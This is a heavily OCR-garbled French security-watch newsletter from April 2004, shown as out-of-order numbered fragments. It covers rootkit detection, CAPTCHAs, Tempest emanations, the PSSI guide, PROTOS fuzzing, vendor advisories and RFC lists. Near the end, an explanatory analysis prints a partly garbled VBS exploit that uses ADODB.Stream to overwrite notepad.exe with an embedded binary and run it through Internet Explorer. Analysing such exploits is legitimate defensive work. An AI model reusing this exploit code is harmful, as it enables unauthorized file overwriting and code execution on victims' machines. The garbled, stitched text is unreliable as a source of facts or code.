compte environ 300000 postes connect s en r seau et le
27. d tecter la pr sence d un rootkit en environnement WIN32 Rapport N 61 Ao t 2003 Rappelons que le terme rootkit d signe un module logiciel et son interface de pilotage destin tre install au coeur du syst me d exploitation dans l optique de fournir un ensemble de fonctionnalit s masqu es permettant d acc der en toute libert aux ressources du syst me Longtemps r serv s aux seuls environnements UNI X et plus particuli rement aux syst mes Solaris et Linux de plus en plus de rootkits ciblent d sormais le syst me Windows Citons fu diffus fin 2002 Hacker Defender qui a vu le jour en 2003 ou encore le tr s r cent hedhook en provenance des pays de l Est En environnement Windows les rootkits sont une menace d autant plus grave que la complexit de l architecture du syst me d exploitation dont on rappellera qu il comporte encore de nombreuses zones d ombres facilite leur dissimulation et les rend extr mement difficiles d tecter Si les m canismes d installation diff rent l g rement entre les environnements LINUX et WI N32 les proc d s de d tection et les moyens de protection restent cependant assez similaires comparaison de la table des appels syst mes avec une table de r f rence mesure statistique du nombre d instructions ex cut es entre deux points de r f rence supervision du mode trace filtrage et protection des points d entr e l gitimes ou non permettant d inst
28. entre royaumes permettant de se faire oour un tiers http www ciac org ciac bulletins o 109 shtml CVE 2004 0371 Reprise de l avis Apple 2004 04 05 Le CIAC a repris sous la r f rence O 110 les avis Apple pour Mac OS X Jaguar et Panther Plusieurs vuln rabilit s affectent notamment CUPS et OpenSSL http www ciac org ciac bulletins o 110 shtml CAN 2004 0079 CAN 2004 0110 CAN 2004 0112 CAN 2004 0382 CAN 2004 0383 Reprise de l avis Cisco 50430 Le CIAC a repris sous la r f rence O 112 l avis Cisco 50430 propos d une mauvaise gestion des paquets IKE malform s dans le module VPN Service pouvant conduire un d ni de service http www ciac org ciac bulletins o 112 shtml Reprise de l avis Debian DSA 478 1 Le CIAC a repris sous la r f rence O 113 l avis Debian DSA 478 1 concernant deux vuln rabilit s dans l outil tcpdump pouvant entrainer un d ni de service distant http www ciac org ciac bulletins o 113 shtml CAN 2004 0183 CAN 2004 0184 amp O w us te R vision de l avis 44281 concernant le protocole LEAP CISCO annonce la disponibilit du protocole EAP FASTx qui constitue une parade la vuln rabilit du protocole LEAP face une attaque par dictionnaire D autres parades sont propos es dans l avis qui sont plus lourdes mettre en uvre car n cessitant une infrastructure de gestion de clefs http www cisco com warp public 707 cisco sn 20030802 leap shtml
29. et l ann e pr c dente Ces informations sont mises jour la fin de chaque p riode de veille L attention du lecteur est attir e sur le fait que certains avis sont repris et rediffus s par les diff rents organismes Ces chiffres ne sont donc repr sentatifs qu en terme de tendance et d volution P riode du 27 03 2003 au 28 04 2004 Cumul 2004 Constructeurs Cumul 2003 Constructeurs Cumul P riode 2004 2003 EE ETES US CERT ji CERT IN CI AC z 129 Greene 16 74 284 6 15 21 4 24 93 1 4 12 1 4 40 4 27 118 Oracle Cumul 2004 Editeurs Cumul 2003 Editeurs Macromedia Microsoft Novell Novell BEA Novell 89 791 2096 Linux RedHat BEA Oracle Linux Fedora Linux Debian 27 90 190 Linux Mandr Pi 2 2 FreeBSD Stake e eEye X Force i 3195 1196 Micros oft 2996 Macromedia Oracle Microsoft 8 Veille Technologique S curit N 69 Page 33 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 ALERTES DETAI LLEES Les tables suivantes pr sentent une synth se des principales alertes de s curit mises par un organisme fiable par l diteur du produit ou par le constructeur de l quipement Ces informations peuvent tre consid r es comme fiables et authentifi es En cons quence les correctifs propos s s il y en a doivent imm dia
30. exemple pr sent ci contre le param tre distinctif est l paisseur du trait Veille Technologique S curit N 69 Page 8 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Identification d une signification commune avec le programme PIX dont le code est lui aussi accessible sur le site de l universit de Carnegie Mellon L objectif est ici de r pondre la question De quoi ces images sont elles significatives Dans le cas pr sent ci contre les r ponses autoris es sont bicycle ou bicycles L approche ici utilis e pose le probl me de la cr ation du r f rentiel sur la forme les images et le fond les significations associ es chacune d elles Une technique l gante a t retenue qui consiste s appuyer sur le fond d images offert par l Internet et faire documenter celles ci par les Internautes sous une forme ludique Ceux ci sont en effet invit s jouer un jeu en ligne d nomm ESP se qui se pratique deux joueurs s lectionn s au hasard parmi les volontaires s tant connect s Chaque joueur se voit pr senter une image et une liste de significations triviales et donc bannies L objectif est de trouver le plus grand nombre de qualificatifs le score tant calcul sur le nombre de qualificatifs communs avec le joueur adverse Chaque image ainsi labellis e viendra enrichir l
31. image g n r e dynamiquement sur le site Ce proc d s est av r remarquablement performant jusqu peu le taux de reconnaissance noue des mots ainsi pr sent s par les meilleurs outils restant trop faible pour justifier l investissement Cependant fin 2003 un groupe de chercheurs de l universit de Berkeley mettait au point un nouveau proc d d analyse offrant un taux de reconnaissance de l ordre de 9296 en ne n cessitant que quelques secondes de temps de calcul Ce taux de reconnaissance chute h las dramatiquement lorsqu il est appliqu l une des variantes du proc d consistant reconna tre 3 mots parmi les 10 mots pr sent s entrelac s par paire dans une m me image Avec seulement 33 de succ s en reconnaissance automatique cette variation du proc d Gimpy Il P1 conserve tout son int r t sans pour autant complexifier le d chiffrage visuel Plusieurs autres alternatives sont tudi es qui toutes proc dent de la m me d marche fondamentale sous des formes vari es Association de formes avec le programme Bongo dont le source est librement accessible sur le site de l universit de Carnegie Mellon L utilisateur se voit pr senter deux s ries de formes et doit d terminer le a param tre distinctif utilis pour s parer ces formes en deux s ries Quatre nouvelles formes sont ensuite pr sent es que l utilisateur devra son tour classer dans l une des s ries droite ou gauche Dans l
32. impl mentation TCP des produits M Series T Series et E series fonctionnant sous JUNOS 6 et JUNOSe 5 ainsi que les pare feu NetScreen fonctionnant sous ScreenOS 5 et inf rieur Caldera annonce la disponibilit des correctifs corrigeant les vuln rabilit s pr sentes dans les paquetages Util linux CSSA 2004 015 0 vim CSSA 2004 016 0 Debian annonce la disponibilit des correctifs corrigeant les vuln rabilit s pr sentes dans les paquetages pam pgsql linux kernel interchange fte oftpd squid linux kernel heimdal xine ui tcpdump linux kernel linux kernel linux kernel linux kernel mysql xonix ssmtp CVS neon logcheck linux kernel zope linux kernel iproute xchat ident2 linux kernel DSA 469 DSA 470 DSA 471 DSA 472 DSA 473 DSA 474 DSA 475 DSA 476 DSA 477 DSA 478 DSA 479 DSA 480 DSA 481 DSA 482 DSA 483 DSA 484 DSA 485 DSA 486 DSA 487 DSA 488 DSA 489 DSA 490 DSA 491 DSA 492 DSA 493 DSA 494 DSA 495 2 4 18 hppa 18i386 alpha 18 hppa 17 ia64 17 s390 2 4 2 4 2 4 2 4 2 4 17 mips 2 4 19 mips http www debian org security 2004 Fedora annonce la disponibilit des correctifs corrigeant les vuln rabilit s pr sentes dans les paquetages FEDORA 2004 101 FEDORA 2004 102 FEDORA 2004 104 FEDORA 2004 108 FEDORA 2004 111 kernel openoffice squid utempter kernel Veille Technologique S curit N 69 APOGEE Communications Tous droits r serv s Page 50 64
33. imposant une r duction draconienne facteur de 10 du niveau de rayonnement dans l entourage imm diat de l quipement mais aussi par une analyse pouss e des corr lations existantes entre les signaux rayonn s En 1998 Markus Kuhn innovait en proposant une approche alternative voire orthogonale la premi re dite Soft Tempest Son id e tait de combattre le probl me sa racine en tentant de modifier voire de d truire la relation existant entre le signal observ et la repr sentation r elle L une des approches sugg r e f t d utiliser une police de caract re sp cialement con ue pour rendre illusoire toute tentative d analyse et de reconstruction La seconde approche plus adapt e aux environnements purement graphiques consiste manipuler le spectre rayonn pour leurrer le tiers espion en lui pr sentant un contenu n ayant aucun rapport avec l image pr sent e sur l cran original et ce sans alt rer ce dernier A Le proc d employ consiste incruster une image statique sous la forme d un filigrane non visible par l utilisateur mais g n rant un spectre de rayonnement largement sup rieur celui du reste de l cran c act us foe 1 22 lt elevizio recrp ler is pickes a Feneciallg in the csse af digitsl epfipec tes 5 problea becsuse remote reconstruction of zipncls 5 X a RN aaj 16 this kin lt m gt E
34. m me du signal dont le niveau de rayonnement est bien plus r duit que celui d un moniteur classique connectique de longueur tr s r duite et transmission de donn es dans un rail d alimentation r duit Les r sultats obtenus sont n anmoins surprenants comme le montre la copie d cran pr sent e dans le rapport et reproduite ci contre Celle ci a t obtenue par analyse des signaux compromettants transmis par un portable Toshiba 440CDX partir d un point de mesure situ une distance de 10m et travers deux cloisons Ces r sultats devront toutefois tre modul s par les conditions d exp rimentation se rapprochant de celle d un terminal classique fonctionnant en mode texte et non en mode graphique affichage d un texte statique dans une fen tre xterm Quoiqu il en soit on retiendra de cette exp rience qu elle a t men e avec des moyens la port e d un amateur clair analyseur de spectre oscilloscope num rique m moire et r cepteur de mesure large bande et qu elle a t largement simplifi e par la nature m me de l information transf r e entre l quipement et le dispositif d affichage information transmise s quentiellement et de nature p riodique La corr lation entre l information acquise et sa repr sentation sur la cible est grandement simplifi e Plusieurs proc d s peuvent tre employ s pour combattre ce probl me La norme Tempest tente de combattre indirectement le probl me en
35. mes BIV D ni de service via SSL dans HTTP Server IBM HTTP Server est vuln rable un d ni de service lors su traitement de paquets SSL sp cialement construits IBM HTTP Server 1 3 12 x 1 3 19 x 1 3 26 x et 1 3 28 2 0 42 x et 2 0 47 IBM GSKIT versions inf rieures 4 0 3 345 5 0 5 92 6 0 6 33 7 0 1 16 Correctif existant Global Security Toolkit GSKIT Mauvaise gestion du protocole SSL IBM 1165486 http www 1 ibm com support docview wss rs 177 amp context SSEQTJ amp uid 2swg21165486G amp loc en US Authentification non autoris e sur I MPI Les fonctionnalit s IMPI Intelligent Platform Management Interface sont accessibles sans authentification Intel Intelligent Platform Management Interface IPMI 1 5 Server Board SCB2 SDS2 SE7500WV2 SHG2 SE7501WV2 SE7501HG2 SE7501BR2 Carrier Grade Server TSRMT2 TSRLT2 TIGPR2U Server Platform SRSH4 SPSH4 SR870BN4 SR870BH2 Entry Server Board SE7210TP1 E Server Platform SR1325TP1 E HP Carrier Grade Server CC2300 A6898A A6899A CC3300 A6900A A6901A CC3310 9862 A9863A Correctif existant Outils de configuration IMPI Positionnement d un mauvais type d authentification Intel AA 679 1 ftp download intel com support motherboards server sb aa6791invalidlanconfiguration040504 pdf Intel CS 010422 http support intel com support motherboards server sb CS 010422 htm HPSBGNO1009 http www4A itrc hp com service cki docDisplay do docl dZHPSBGNO1009 ERCH
36. pays du sud De ce fait un d veloppement plus quitable entre les pays du nord et du sud ne peut tre organis que par la mise en uvre d actions volontaires de d veloppement et d entre aide d cid es au niveau politique Les statistiques ci contre pr sentent les estimations concernant le nombre d internautes pr sents sur les diff rents continents et indique son volution entre 2000 et 2004 L cart est patent entre les continents du Sud et ceux du Nord La coop ration internationale appara t ainsi devoir devenir une composante incontournable du d veloppement mondial de l Internet En marge du d veloppement fulgurant de l Internet d veloppement autonome mais pas anarchique pour autant les institutions ont d cid de r agir afin de trouver des r gles permettant de contr ler d encadrer et pour ainsi dire gouverner cette soci t immat rielle La gouvernance d un Internet pine dorsale de cette soci t est ainsi devenue une pr occupation majeure et internationale Dans l optique de structurer une r flexion consensuelle sur la nature de cette gouvernance l ONU a confi en 2001 la pr paration du Sommet Mondial sur la Soci t de l Information SMSI l Union Internationale des R partition des internautes par continent Evolution du nombre d internautes en millions entre 2000 et 2004 Am rique du Nord 136 7 156 3 167 7 179 8 13 3 26 2 33 1 43 4 Afrique 4 6 5 7 7 7 9 2 115 9 165 0 181 5 205 0
37. public est alors compos essentiellement d universitaires et de militaires qui acc dent des services innovants et destin s aux professionnels tels que transfert de fichier messagerie groupes de news Quatorze ans plus tard plus de 720 millions d internautes acc dent des m ta services v ritables transcriptions informatiques du monde r el commerce lectronique e Learning g olocalisation t l travail e Administration Petit petit l expression consacr e d autoroutes de l information c de le pas celle de soci t de l information Tout un symbole Les probl matiques Les enjeux r v l s par les technologies de l information et cristallis s par l Internet sont multiples 115 sont abstraction faite de la technique transverses soci taux conomiques et politiques Transverses car les Technologies de l Information sont au coeur des m canismes qui r gissent le transport de l information et le traitement qui lui conf rera une valeur ajout e Soci taux car nombre de services d velopp s gr ce aux Technologies de l Information sont des avatars du monde r el On pense ici notamment au commerce commerce lectronique l ducation acc s au savoir et l information formations promotion de l Internet aux droits et libert s libert d expression protection de la vie priv e protection des oeuvres artistiques mais aussi la citoyennet e Administration Nous ne manquerons pas de cit
38. s http news com com 2100 7345 5180510 html Dans le registre des curiosit s l artiste su dois Jakob Boeskov nous propose l un des meilleurs attrape nigauds qu il nous ait t donn de lire par le biais de la tr s s rieuse soci t fictive Empire North Celle ci propose deux produits faire froid dans le dos dont ID Sniper un fusil destin implanter a distance une tiquette lectronique en associant celle ci la photo de la cible Une excellente d monstration du pouvoir de d sinformation d Internet http www backfire dk EMPI RENORTH newsite products en001 htm http www jakobboeskov com Pour conclure nous annon ons l existence d une traduction en fran ais du Top20 du SANS Institute et du Top 10 de l OWASP le r sultat des efforts de deux francais parmi lesquels un de nos fideles lecteurs http www sans org top20 top20 v40 french pdf L quipe de Veille Technologique Veille Technologique S curit N 69 Page 5 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 PRODUITS ET TECHNOLOGIES LES PRODUITS VALIDATION Description En 1999 l universit d Oulu lan ait un projet ambitieux ayant pour objectif l tude des proc d s applicables SI au test et la validation fonctionnelle de l impl mentation des protocoles de communication L approche retenue par le projet PROTOS est c
39. s par l OCDE dans ses Lignes directrices r gissant la s curit des syst mes et r seaux d information Sensibilisation Principe conserv de la version pr c dente Les parties prenantes doivent tre sensibilis es au besoin d assurer la s curit des syst mes et r seaux d information et aux actions qu elles peuvent entreprendre pour renforcer la s curit Responsabilit Principe conserv de la version pr c dente Les parties prenantes sont responsables de la s curit des syst mes et r seaux d information Opportunit dans la version pr c dente Les parties prenantes doivent agir avec promptitude et dans un esprit de coop ration pour pr venir d tecter et r pondre aux incidents de s curit OCT Principe conserv de la version pr c dente Les parties prenantes doivent respecter les int r ts l gitimes des autres parties prenantes D mocratie Principe conserv de la version pr c dente La s curit des syst mes et r seaux d information doit tre compatible avec les valeurs fondamentales d une soci t d mocratique Evaluation des risques Proportionnalit dans la version pr c dente Les parties prenantes doivent proc der des valuations des risques URAA ANR Int gration dans la version pr c dente Les parties prenantes doivent int grer la s curit en tant qu l ment essentiel des syst mes et r seaux d information Gestion de la s curit Pluridisciplin
40. sesp rer de l abondance de la litt rature anglo saxonne traitant du sujet La lecture du guide PSSI 131 pages au total est bien videmment recommand le lecteur pouvant contribuer son volution par le biais des formulaires de recueil de commentaires joints en annexe de chacun des quatre volumes du guide dont nous reproduisons ci dessous la table des mati res SECTI ON 1 INTRODUCTI ON Avant Propos Concepts Manipul s Conventions d criture5 1 PR SENTATI ON DU GUIDE 2 PR SENTATI ON ET R LE DE LA PSSI 2 1 contexte de la s curit des syst mes d information 2 2 n cessit d une PSSI 2 3 domaines d application de la PSSI 2 4 place de la PSSI dans le r f rentiel documentaire 2 5 les bases de l gitimit d une PSSI BI BLI OGRAPHIE FORMULAI RE DE RECUEI L DE COMMENTAI RES SECTI ON 2 M THODOLOGI E Introduction Objet du document 1 INTRODUCTION LA M THODE 2 D MARCHE D LABORATI ON D UNE PSSI 2 1 Conventions d criture 2 2 Phase 0 pr alables 2 3 Phase 1 laboration des l ments strat giques 2 4 Phase 2 s lection des principes et r daction des r gles 2 5 Phase 3 finalisation 3 PLAN TYPE D UNE PSSI FORMULAI RE DE RECUEI L DE COMMENTAI RES SECTI ON 3 PRINCIPES DE S CURI T Introduction Objet du document 1 PRINCI PES ORGANI SATI ONNELS 2 PRINCIPES DE MI SE EN UVRE 3 PRINCIPES TECHNI QUES FORMULAIRE DE RECUEIL COMMENTAIRES SECTI ON 4 R F RENCES SSI Introduction O
41. t ches 6 principes INC Gestion des incidents 7 principes FOR Formation et sensibilisation 11 principes EXP Exploitation 25 principes ENV Aspects physiques et environnement 16 principes AUT Identification authentification 4 principes CAL Contr le d acc s logique aux biens 14 principes JRN JjJournalisation 6 principes IGC Gestion des cl s cryptographiques 3 principes SCP Signaux compromettants 4 principes Disposer d un r f rentiel quand bien m me serait il parfaitement document ne sert rien s il n est pas accompagn d une m thodologie destin e accompagner l utilisateur dans la s lection des principes adapt s aux objectifs et aux besoins de l organisation mais aussi dans la d clinaison de ceux ci en r gles pratiques et applicables 11 serait bien illusoire d envisager pouvoir construire une politique de s curit viable et pertinente en retenant en bloc les 160 principes du r f rentiel Le guide PSSI sera tout aussi indispensable dans l laboration d une strat gie de s curit que l a t son pr d cesseur PSI dont h las la notori t n a jamais t la hauteur de la qualit et de l int r t du document Cette nouvelle version intervient point pour combler le retard constat dans le domaine de la m thodologie s curitaire vis vis des travaux engag s l tranger et principalement aux Etats Unis satisfera pleinement les sp cialistes du domaine qui pouvaient d
42. txt D ni de service dans plusieurs produits Symantec Plusieurs produits Symantec sont vuln rables des attaques par d ni de service 21 04 Symantec Client Firewall 5 01 et 5 1 1 Client Security 1 0 et 1 1 Norton Internet Security 2003 et 2004 Norton Internet Security Professional 2003 et 2004 Norton Personal Firewall 2003 et 2004 Correctif existant Produits Symantec Mauvaise gestion des paquets TCP SYMO4 007 http www sarc com avcenter security Content 2004 04 20 html CAN 2004 0375 Veille Technologique S curit N 69 Page 44 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 TCPDUMP Multiples vuln rabilit s dans tcpdump Deux vuln rabilit s affectent les fonctions d affichage des paquets ISAKMP pouvant conduire ainsi un d ni de service de l application Forte 30 03 Tcpdump version 3 8 1 et inf rieure Correctif existant Paquets ISAKMP Mauvaise gestion des paquets ISAKMP malform s Rapid7 R7 0017 http www rapid7 com advisories R7 0017 html CAN 2004 0183 CAN 2004 0184 Correctif existant Interface HTTP D bordement de buffer CERT VU 206382 http www kb cert org vuls id 206382 CERT VU 623854 http www kb cert org vuls id 623854 TS 20040305 http www tildeslash com monit secadv 20040305 txt x Y E Fm BU D P Mauvais filtrage des messages dans
43. vuln rabilit dans le m canisme de mise jour YaST Online Update peut conduire l acquisition locale de droits privil gi s Moyenne 07 04 SusEUmuxversion SO et inf rieures C EEENN MACROMEDI A ALTARA 70 A Prise de contr le du serveur via Dreamweaver Une faille dans Dreamweaver permet de prendre distance le contr le du serveur de base de donn es Critique 02 04 Macromedia Dreamweaver MX 2004 toutes versions MX toutes versions UltraDev 4 toutes versions Correctif existant Scripts de connexion Acc s aux scripts de connexion MPSB04 05 http www macromedia com devnet security security zone mpsb04 05 html Forte 15 04 ColdFusion MX 6 1et6 1 2EE toutes ditions C o DAOG Il Une vuln rabilit dans Outlook Express permet l ex cution d un code arbitraire distance Critique 13 04 Microsoft Outlook Express 5 5 et 6 toutes versions les vuln rabilit s dans Microsoft Windows Plusieurs vuln rabilit autorisent l ex cution de code arbitraire l acquisition de droits privil gi un d ni de service Eu ud 13 04 Microsoft Windows 98 98 SE et ME NT 4 0 toutes versions 2000 SP2 SP4 XP toutes versions Server 2003 toutes versions Netmeeting Correctif existant Se r f rer au bulletin Mircosoft Multiples vuln rabilit s MS04 011 http www microsoft com technet security bulletin MS04 011 mspx CAN 2003 0533 CAN 2003
44. 004 dsa 477 CAN 2004 0372 Vuln rabilit dans le Une vuln rabilit affectant le paquetage de jeu xonix peut autoriser un utilisateur local acqu rir des droits orivil gi s Moyenne 14 04 Debanlimux 30 wondy COCO O O oS SSS http lists debian org debian security announce debian security announce 2004 msg00083 html CAN 2004 0157 cr ation non s curis e d un r pertoire dans logcheck e paquetage logcheck est sensible des attaques par liens symboliques ere 19 04 Debian Linux 3 0 woody Correctif existant Paquetage logcheck Cr ation d un r pertoire temporaire non s curis e DSA 488 1 http www debian org security 2004 dsa 488 CAN 2004 0404 Veille Technologique S curit N 69 Page 37 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Une vuln rabilit dans le paquetage utempter peut entra ner l crasement de fichiers arbitraires Moyenne 21 04 Red Hat Fedora Core 1 O La biblioth que WebDAV neon int gr e dans les paquetages cadaver et openoffice est sensible de multiples vuln rabilit s dans le formatage de cha nes de caract res Forte 14 04 Red Hat Linux 9 Enterprise Linux AS ES et WS versions 2 1 3 OC o Correctif existant Biblitoth que neon Mauvais formatage de cha nes de caract res Cr ation non s curis e de fichiers temporaires Une
45. 04 Noyau Linux versions 2 4 et 26 ooo Securitv Tracker http www securitytracker com alerts 2004 Apr 1009931 html CAN 2004 0228 CAN 2004 0394 D bordement de buffer dans le noyau Linux Un d bordement de buffer dans la gestion des sockets IP peut autoriser un utilisateur local acqu rir des droits privil gi s ou provoquer un d ni de service Forte 20 04 Noyau Linux 2 4 22 2 4 25 Noyau Linux 2 6 1 2 6 3 Correctif existant Fonction ip setsockopt D bordement de buffer ISEC Security Res http isec pl vulnerabilities isec 0015 msfilter txt Veille Technologique S curit N 69 Page 42 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Forte 17 04 Macromedia ColdFusion MX Mauvaise gestion des messages d erreurs PR 1 A MIA CGLP NIMBL 1 3l EN A E A Mi m ow n Bugtrao http www securityfocus com archive 1 360543 PNR Eu MI CF OFT Une erreur dans la gestion des images au format BMP permet de saturer la m moire du syst me distance Forte 11 04 Internet Explorer 5 0 60 OSOS D ni de service dans Outlook Express 6 Une vuln rabilit affectant Outlook Express 6 dans sa gestion des fichiers EML peut provoquer un d ni de service dans l application Moyenne 11 04 Microsoft Outlook Expr
46. 2 La protection des bases de donn es 8 LES DI SPOSITIONS RELATI VES LA CRYPTOLOGI E 9 LES DISPOSITIONS RELATI VES LA SI GNATURE LECTRONIQUE 10 AUTRES TEXTES 10 1 Au niveau National 10 1 1 Protection des int r ts conomiques 10 1 2 Protection du secret 10 1 3 Syst mes d information 10 1 4 Savoir faire 10 1 5 Cybersurveillance 10 1 6 Autres 10 2 Au niveau International 10 2 1 Conseil de l Europe 10 2 2 ONU FORMULAIRE DE RECUEI L DE COMMENTAIRES Nous avons particuli rement appr ci le dernier volet de ce guide qui propose une liste mise jour des textes et r f rences applicables dans le domaine dont notamment les diff rents codes d thiques publi s dans le monde Les URL permettant d acc der aux diff rents documents sont pr cis es quand cela est possible 6 6 6 6 6 6 7 LE 7i Compl ment d information http www ssi gouv fr fr confiance pssi html Guide PSSI version courante du 3 mars 2004 http www oecd org dataoecd 58 62 1946930 doc Lignes directrices de l OCDE version 2002 DCSSI GUIDE TDBSSI Description Venant compl ter la s rie de documents m thodologiques publi s la DCSSI dont PSSI Guide d laboration de Politiques de S curit des Syst mes d Information ou encore EBIOS Expression des Besoins et Identification des Objectifs de S curit le guide TBDSSI se propose de nous accompagner dans la sp cification et la d finition des tableaux de bo
47. 22 et B 11 23 115 corrigent une vuln rabilit dans certaines fonctions RPC pouvant entra ner un d ni de service distant http wwwA4 itrc hp com service cki docDisplay do docl d HPSBUX01020 R vision du bulletin HPSBUX0302 241 HP a r vis le bulletin HPSBUX0302 241 au sujet d un d bordement de buffer exploitable localement dans le orogramme stmkfont afin d annoncer la disponibilit du correctif PHSS 29744 pour HP B 11 00 http wwwb itrc hp com service cki docDisplay do docl dZHPSBUX0302 241 Veille Technologique S curit N 69 Page 49 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Correctifs pour OpenSSL IBM a annonc la disponibilit des correctifs pour OpenSSL sur IBM HTTP Server 1 3 x et 2 0 x Plusieurs vuln rabilit s dans la biblioth que OpenSSL ASN 1 permettent de provoquer un d ni de service I BM HTTP Server 1 3 x APAR PQ86671 http www ibm com support docview wss rs z177 amp context SS EQTJ amp uid swg24006718 IBM HTTP Server 2 0 x APAR PQ86671 http www ibm com support docview wss rs 177 amp context SSEQTJ amp uid swg24006719 Notons que cette vuln rabilit n affecte pas l impl mentation IBM Java Secure Sockets Extension I BM SSE http www 1 ibm com services continuity recover1 nsf mss MSS OAR E01 2004 0422 1 Juniper a annonc la vuln rabilit l attaque par d ni de service dans l
48. 23 04 04 Pst Securing Block Storage Protocols over IP 3740 03 04 nf The Multicast Group Security Architecture SACRED 3760 04 04 Inf Securely Available Credentials SACRED Credential Server Framework RFC TRAI TANT DE DOMAI NES CONNEXES LA S CURI T Th me IETF 3724 03 04 nf Rise of the Middle amp Future of End to End Reflections on the Evolution of the Internet Architecture AUTRES RFC Th me DHCP 3736 04 04 st Stateless Dynamic Host Configuration Protocol DHCP Service for IPv6 HOAX 3751 04 04 nf IDN 3743 04 04 nf _ JET Guidelines for IDN Registration and Administration for Chinese Japanese and Korean iSCSI 3720 04 04 PPst internet Small Computer Systems Interface iSCSI 3721 04 04 Inf internet Small Computer Systems Interface iSCSI Naming and Discovery 3722 04 04 Pst String Profile for Internet Small Computer Systems Interface iSCSI Names SIGNAL 3726 04 04 nf Requirements for Signaling Protocols SIP 3680 03 04 Pst A Session Initiation Protocol SIP Event Package for Registrations 3725 04 04 BCP Best Current Practices for Third Party Call Control 3pcc in the Session Initiation Protocol SIP 76 graz 103 04 Exp Slow Start for TCP with Large Congestion Windows 3782 04 04 Pst The NewReno Modification to TCP s Fast Recovery Algorithm i FR _ EL T m Im Jate TAT Itre C E LES DRAFTS
49. 43015 tests Mise en vidence de multiples d bordements de buffer Preuve d une exploitation possible menant l ex cution d un code arbitraire sur le serveur Application d un jeu de 4527 messages diff rents Mise en vidence de multiples anomalies pouvant provoquer au mieux un d ni de service voire l ex cution d un code malicieux sur un des terminaux Application d un jeu de 4497 formes syntaxiques Mise en vidence de multiples anomalies Message INVITE Protocole SI P I mpl mentations SIP diverses non d taill S Protocole H225 Protocole H323 Impl mentations H225 diverses non d taill La mise en oeuvre de ces tests n cessite de disposer d une plate forme logicielle dont on attend qu elle facilite la d finition des diff rents jeux de tests mais aussi qu elle permette l automatisation de toutes les s quences de la campagne de validation de l engagement des tests l mentaires sur les diff rentes cibles jusqu la comptabilisation et la classification des r sultats La plate forme utilis e par l universit d Oulu dans le cadre du projet PROTOS a t fournie par la soci t Finlandaise Codenomicon Cette soci t propose d sormais un ensemble de plates formes de tests pr configur es pour l injection de fautes et la qualification en bo te noire des protocoles suivants e Protocole GTP GPRS Tunneling Protocol Veille Technologique S curit N 69 APOGEE Communica
50. AC IVESTATE D bordement de buffer dans la fonction win32 stat x ActivePerl est vuln rable un d bordement de buffer distant dans la fonction win32 stat Forte 06 04 ActiveState ActivePerl Win32 version 5 8 3 et inf rieures Correctif existant D bordement de buffer exploitable distance iDefense 93 http www idefense com application poi display id 93 amp type vulnerabilities CAN 2004 0377 DOB D ni de service dans Adobe Acrobat Reader Une vuln rabilit dans la gestion des fichiers PDF corrompus par Acrobat Reader peut conduire un d ni de service du syst me Forte 11 04 Adobe Acrobat Reader versions 4 0 et 5 0 Acrobat Reader Mauvaise gestion des fichiers PDF corrompus http www securityfocus com archive 1 360133 Forte 24 04 Apache version 1 3 29 Une vuln rabilit dans un composant du service en ligne BitDefender Scan Online peut entra ner l exposition d informations et l ex cution de code arbitraire distant Forte 19 04 BitDefender Scan Online AvxScanOnlineCtrl 1 Mauvaise gestion des acc s aux propri t s du contr le ActiveX Full Disclosure http 115 5 netsys com pipermail full disclosure 2004 April 020325 html wELEAAITIAXV Plusieurs vuln rabilit s permettent de provoquer son arr t brutal ou l ex cution de code arbitraire distance Forte 30 03 ClamAV 0 68 et inf rieurs ClamAV 0 67 GNOME
51. AdoDb Stream pour remplacer le code d un fichier ex cutable dont la localisation est connue par un code d fini sous la forme d un tableau d octets dans le script script language vbs Langage VBS Tableau d octets correspondant au code binaire du programme devant remplacer Notepad Hana io vehe se ren Liste des localisations possibles du programme win2ok c winnt notepad exe Notepad dans les diff rences environnements winxp c NwindowsNsystem32Nnotepad exe Windows winxpee c windows notepad exe win982 c NwindowsNnotepad exe wWin98ate c windows system32 notepad exe Meme TAdodb ot rem Ouverture d une instance du composant AdoDb Sauvegarde de la cha ne au format texte jelmer Open jelmer WriteText toString jelmersArray jelmer Position 0 yore Sue eee Transcription au format binaire jelmer Position Z2 bytearray jelmer Read jelmer Close Veille Technologique S curit N 69 Page 61 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 SIS malware e ECTS Ouverture d une instance du composant AdoDb malware Type adTypeBinary malware Open malware Write bytearray Sauvegarde de la cha ne On Error Resume Next En cas d erreur on continue sur l instruction suivant malware savetofile win2k adSave
52. CreateOverWrite Tentative de transfert vers lun des fichiers On Error Resume Next En cas d erreur on continue sur l instruction suivant malware savetofile win2ok adSaveCreateOverWrite Tentative de transfert vers lun des fichiers Dans le cas pr sent le contenu du fichier Notepad exe est cras par le code contenu dans le script en l occurrence un programme MS DOS de 2378 octets affichant une simulation d incendie L invocation du protocole View source conduira ex cuter ce programme E http www malware com junk de lux html Microsoft 1 M EX c CAWINNT system32 snotepad exe FROZEN e Mn Z7 Nous conclurons ici notre digression dont nous esp rons qu elle aura permis tout un chacun de d couvrir la complexit de l impl mentation des m canismes li s l infrastructure WEB et plus pr cis ment les subtilit s de certaines extensions qui sont venues se greffer autour de cette infrastructure Le lecteur n aura pas manqu de remarquer que les vuln rabilit s exploit es ont pour la plupart t publi es en Juillet dernier par un chercheur ind pendant Liu Die Yu Faisant appel des m canismes peu document s et complexes et qui plus est publi s sans grand d tail ces vuln rabilit s s av rent six mois plus tard bien plus critiques qu il n y paraissait au premier abord A ce jour rien ne permet d envisager une diminution des risques induits par ces vuln rabilit s dont la plupart n ont to
